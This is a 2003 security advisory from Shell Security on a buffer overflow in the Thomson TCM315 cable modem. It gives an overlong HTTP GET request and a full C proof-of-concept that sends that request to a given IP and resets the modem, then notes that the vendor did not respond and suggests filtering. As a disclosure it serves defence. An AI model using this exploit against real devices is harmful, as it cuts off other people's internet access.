TCM315.txt

`___________________________________________________________________________  
  
. : Shell Security Advisory : .  
  
Subject: Buffer overflow in the cable modem Thomson TCM315  
  
Issue date: 2003 November 23  
  
Related link: http://www.shellsec.net/leer_advisory.php?id=2  
  
Homepage: http://www.shellsec.net  
  
Info about product: http://www.qb.ro/docs/tcm315.pdf  
  
___________________________________________________________________________  
  
  
[ - 1 - Introduction ]  
----------------------------  
  
Software description:  
  
Thomson TCM315 cable modem  
  
- DOCSIS 1.0 certified  
  
- DOCSIS 2.0 ready and DOCSIS 1.1 compliant  
  
- NAT/PAT/Firewall and integrated router for SOHO installations (in a   
separate software release)  
  
- Bridging between the USB and Ethernet port  
  
- Easy Access to Advanced Diagnostics Web Pages  
  
- USB port for easy installation  
  
- Reliable high-performance platform  
  
- Surf the Internet Up to 100 Times Faster than a 56k analog Modem  
  
- Internet On-Off button for enhanced security  
  
  
[ - 2 - Problem description ]  
----------------------------------------  
  
The problem appears by sending an HTTP request with a long string to the   
cable modem, causing a deny of service (DoS). Example:  
  
GET /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \  
  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1  
  
or  
  
http://<cablemodem.IP>/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \  
  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
  
  
[ - 3 - How to exploit it ]  
----------------------------------  
  
To test this vulnerability, we used the next code. Note: the code is   
written in C to be used in Windows systems, but it's easily portable to   
Unix systems.  
  
--------------------- CUT HERE ---------------------  
  
/*  
ADVISORY - Thomson Cablemodem TCM315 Denial of Service  
  
Shell security group (2003) http://www.shellsec.net  
  
November 10 of 2003  
  
Tested against: TCM315 MP  
Software Version: ST31.04.00  
Software Model: A801  
Bootloader: 2.1.4c  
Impact: Users with access to the network can remotely shutdown internet   
connection.  
  
Discovered by: aT4r Andres[at]shellsec.net  
Vendor: contacted (no answer)  
Fix: no yet  
  
usage: just, thdos.exe 192.168.100.1  
  
*/  
  
#include <stdio.h>  
#include <winsock2.h>  
  
void main(int argc,char *argv[]) {  
char evil[150],buffer[1000];  
struct sockaddr_in shellsec;  
int fd;  
WSADATA ws;  
  
WSAStartup( MAKEWORD(1,1), &( ws) );  
  
shellsec.sin_family = AF_INET;  
shellsec.sin_port = htons(80);  
shellsec.sin_addr.s_addr = inet_addr(argv[1]);  
  
memset(evil,'\0',sizeof(evil));  
memset(evil,'A',100);  
sprintf(buffer,"GET /%s HTTP/1.1\r\n\r\n\r\n",evil);  
  
fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);  
if (connect(fd,( struct sockaddr *)&shellsec,sizeof(shellsec)) != -1) {  
send(fd,buffer,strlen(buffer),0);  
printf("done. Thomson Cablemodem reset!\n");  
sleep(100);  
}  
else printf("Unable to connect to CM.\n");  
}  
  
--------------------- CUT HERE ---------------------  
  
  
[ - 4 - Solution ]  
-----------------------  
  
Thomson was advised about this vulnerability, but we got no answer, so as   
we know there is no patch to fix this issue.. As a possible solution, you   
can filter requests made to the cable modem.  
  
  
[ - 5 - Credits ]  
---------------------  
  
Autor: Andrés Tarascó ( andres[at]shellsec.net )  
Redactor: Fernando Ortega ( fernando[at]shellsec.net )  
Issue date: 23 de Noviembre de 2003  
Url: http://www.shellsec.net  
  
  
_______________________________________________________  
  
Administrador de Shell Security (admin[at]shellsec.net)  
Shell Security Group (http://www.shellsec.net)  
_______________________________________________________   
`